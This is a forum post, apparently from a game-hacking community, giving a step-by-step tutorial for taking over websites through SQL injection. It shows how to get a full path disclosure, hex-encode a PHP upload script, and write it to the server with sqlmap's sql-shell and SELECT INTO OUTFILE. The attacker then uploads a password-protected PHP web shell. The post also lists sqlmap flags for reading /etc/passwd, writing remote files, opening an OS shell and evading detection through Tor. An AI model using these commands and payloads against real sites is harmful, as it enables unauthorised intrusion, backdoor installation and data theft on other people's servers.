(On a side note, hello. . I'm new to MPGH, and I'm looking to share my knowledge.)


i don't know if i should write this its a bit to dangerous to share
but then again everyone whit a brain will figure it out sooner or later
I will use php in this tutorial
this is going to be a really short tutorial

What you need:
- A PHP Shell
cyb3r sh3ll | Free software downloads at SourceForge.net
- A upload script (optional might work without)
PHP File Upload
- sqlmap (optional but makes it so much easier)
sqlmap: automatic SQL injection and database takeover tool

(What is shell?)
- Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.

You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc can be used.

There are some limitations on what kind of programs you can run. It won't do no good if you start a graphical program like Firefox or even a console based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched.They probably also have to terminate within 30 seconds, as this is the default time-limit imposed unto all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time-limit to something else.

But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc


So, lets get started.

1. After finding a vulnerable site you need to get Full Path Disclosure^
I will use the empty array exploit, add the brackets []
(CODE:
"http://www.example.com/index.php?id]Example Domain[]=1"

gives

(CODE:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

now we have the path.

2. now you need to convert your upload script to hex
(CODE:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

becomes

(CODE:
3c666f726d20656e63747970653d226d756c7469706172742f 666f726d2d646174612220616374696f6e3d2275706c6f6164 2e70687022206d6574686f643d22504f5354223e3c696e7075 74206e616d653d2275706c6f6164656466696c652220747970 653d2266696c65222f3e3c696e70757420747970653d227375 626d6974222076616c75653d2255706c6f61642046696c6522 2f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f 706174683d626173656e616d6528245f46494c45535b277570 6c6f6164656466696c65275d5b276e616d65275d293b696628 6d6f76655f75706c6f616465645f66696c6528245f46494c45 535b2775706c6f6164656466696c65275d5b27746d705f6e61 6d65275d2c247461726765745f7061746829297b6563686f20 626173656e616d6528245f46494c45535b2775706c6f616465 6466696c65275d5b276e616d65275d292e2220686173206265 656e2075706c6f61646564223b7d656c73657b6563686f2022 4572726f7221223b7d3f3e

3. Now lets fire up sqlmap with a sql-shell and inject..
(CODE:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell

let sqlmap do its magic and after a while you will get a sql-shell..
(CODE:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

now write..
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
don't forget the 0x before your hex, so it soul look like..
(CODE:
select 0x3c666f726d20656e63747970653d226d756c746970617274 2f666f726d2d646174612220616374696f6e3d2275706c6f61 642e70687022206d6574686f643d22504f5354223e3c696e70 7574206e616d653d2275706c6f6164656466696c6522207479 70653d2266696c65222f3e3c696e70757420747970653d2273 75626d6974222076616c75653d2255706c6f61642046696c65 222f3e3c2f666f726d3e0d0a3c3f7068702024746172676574 5f706174683d626173656e616d6528245f46494c45535b2775 706c6f6164656466696c65275d5b276e616d65275d293b6966 286d6f76655f75706c6f616465645f66696c6528245f46494c 45535b2775706c6f6164656466696c65275d5b27746d705f6e 616d65275d2c247461726765745f7061746829297b6563686f 20626173656e616d6528245f46494c45535b2775706c6f6164 656466696c65275d5b276e616d65275d292e22206861732062 65656e2075706c6f61646564223b7d656c73657b6563686f20 224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";

After a few seconds you should get a confirmation if it was successful or not

4. browse to "http://www.example.com/upload.php" and upload the php shell

5. browse to your php shell and login..


Info:
The username and password for the shell is cyber, gladiator, you can change this in the php file, this specific shell must be named cyb3r-sh3ll.php or it will not work

Think about having a unique name for your upload file so you don't overwrite some existing file, if you change name you also need to change the source.

Extra:
You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.

A theory is that you can inject the full shellcode directly instead of first writing the uploader, the problems is that this specific shell is 268kB but maybe with a smaller shell

sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:

-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote machine must be used with file-dest
--file-dest=/etc/passwd where to write the file-write
--os-shell like the sql-shell but system
--wizard for beginners
--check-waf Check for WAF/IPS/IDS protection

there are many more just check them out

The --file-read/write does not work most of the times maybe im doing something wrong thats why i use sql-shell to write files or do specific commands.

--os-shell is awesome, you cant write php code to disk tho.

well that was it i think, please share your thoughts/concerns or my mistakes

Happy hunting